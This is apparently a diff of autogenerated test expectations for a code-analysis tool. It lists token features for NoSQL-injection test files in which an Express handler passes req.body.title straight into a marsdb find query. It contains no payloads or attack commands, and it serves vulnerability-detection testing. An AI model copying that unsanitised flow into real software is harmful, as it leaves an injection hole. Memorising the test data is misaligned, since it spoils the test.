autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:15:2 | app.pos ... {});\\n}) | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:15:2 | exceptional return of app.pos ... {});\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:15:2 | exceptional return of app.pos ... {});\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:1:15:2 | exceptional return of app.pos ... {});\\n}) | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:5:9:8 | post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:5:9:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:5:9:8 | post | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:10:9:26 | "/documents/find" | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:10:9:26 | "/documents/find" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:10:9:26 | "/documents/find" | calleeImports | express | @@ -1259,6 +6756,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:10:9:26 | "/documents/find" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:10:9:26 | "/documents/find" | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:10:9:26 | "/documents/find" | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:9:28 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:9:28 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:9:28 | db | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:9:28 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:9:28 | db | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | 'arguments' object of anonymous function | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | (req, r ... {});\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | (req, r ... {});\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | (req, r ... {});\\n} | calleeImports | express | @@ -1266,11 +6773,132 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | (req, r ... {});\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | (req, r ... {});\\n} | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | (req, r ... {});\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | exceptional return of anonymous function | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | return of anonymous function | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:29:15:1 | return of anonymous function | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:30:9:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:30:9:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:30:9:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:30:9:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:30:9:32 | req | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:30:9:32 | req | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:30:9:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:30:9:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:30:9:32 | req | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:30:9:32 | req | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:35:9:37 | res | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:35:9:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:35:9:37 | res | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:35:9:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:9:35:9:37 | res | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:13 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:13 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:13 | query | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:13 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:13 | query | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:18 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:18 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:18 | query | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:18 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:18 | query | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:18 | query = {} | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:18 | query = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:18 | query = {} | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:18 | query = {} | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:9:10:18 | query = {} | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:17:10:18 | {} | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:17:10:18 | {} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:17:10:18 | {} | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:17:10:18 | {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:10:17:10:18 | {} | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:7 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:7 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:7 | query | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:7 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:7 | query | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:13 | query.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:13 | query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:13 | query.title | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:13 | query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:13 | query.title | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:30 | query.t ... y.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:30 | query.t ... y.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:30 | query.t ... y.title | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:30 | query.t ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:3:11:30 | query.t ... y.title | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:9:11:13 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:9:11:13 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:9:11:13 | title | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:9:11:13 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:9:11:13 | title | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:19 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:19 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:19 | req | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:19 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:19 | req | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:24 | req.body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:24 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:24 | req.body | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:24 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:24 | req.body | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:30 | req.body.title | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:30 | req.body.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:30 | req.body.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:30 | req.body.title | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:30 | req.body.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:17:11:30 | req.body.title | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:21:11:24 | body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:21:11:24 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:21:11:24 | body | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:21:11:24 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:21:11:24 | body | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:26:11:30 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:26:11:30 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:26:11:30 | title | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:26:11:30 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:11:26:11:30 | title | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:4 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:4 | db | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:4 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:4 | db | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:10 | db.myDoc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:10 | db.myDoc | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:10 | db.myDoc | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:10 | db.myDoc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:10 | db.myDoc | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:15 | db.myDoc.find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:15 | db.myDoc.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:15 | db.myDoc.find | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:15 | db.myDoc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:15 | db.myDoc.find | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:41 | db.myDo ... => {}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:41 | db.myDo ... => {}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:41 | db.myDo ... => {}) | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:41 | db.myDo ... => {}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:41 | db.myDo ... => {}) | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:41 | exceptional return of db.myDo ... => {}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:41 | exceptional return of db.myDo ... => {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:41 | exceptional return of db.myDo ... => {}) | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:41 | exceptional return of db.myDo ... => {}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:3:14:41 | exceptional return of db.myDo ... => {}) | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:6:14:10 | myDoc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:6:14:10 | myDoc | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:6:14:10 | myDoc | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:6:14:10 | myDoc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:6:14:10 | myDoc | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:12:14:15 | find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:12:14:15 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:12:14:15 | find | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:12:14:15 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:12:14:15 | find | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:17:14:21 | query | CalleeFlexibleAccessPath | db.myDoc.find | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:17:14:21 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:17:14:21 | query | calleeImports | ./marsdb-flow-from | @@ -1279,6 +6907,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:17:14:21 | query | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:17:14:21 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:17:14:21 | query | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | 'arguments' object of anonymous function | fileImports | ./marsdb-flow-from body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | (err, data) => {} | CalleeFlexibleAccessPath | db.myDoc.find | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | (err, data) => {} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | (err, data) => {} | calleeImports | ./marsdb-flow-from | @@ -1287,24 +6920,177 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | (err, data) => {} | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | (err, data) => {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | (err, data) => {} | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | exceptional return of anonymous function | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | return of anonymous function | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:24:14:40 | return of anonymous function | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:25:14:27 | err | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:25:14:27 | err | contextSurroundingFunctionParameters | (req, res)\n(err, data) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:25:14:27 | err | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:25:14:27 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:25:14:27 | err | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:30:14:33 | data | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:30:14:33 | data | contextSurroundingFunctionParameters | (req, res)\n(err, data) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:30:14:33 | data | enclosingFunctionBody | req res query query title req body title db myDoc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:30:14:33 | data | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-to.js:14:30:14:33 | data | fileImports | ./marsdb-flow-from body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:1:1:0 | this | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:1:1:1 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:1:1:1 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:1:1:1 | doc | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:1:1:1 | require | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:7:1:13 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:7:1:13 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:7:1:13 | express | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:7:1:34 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:7:1:34 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:7:1:34 | express | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:7:1:34 | express ... press") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:7:1:34 | express ... press") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:7:1:34 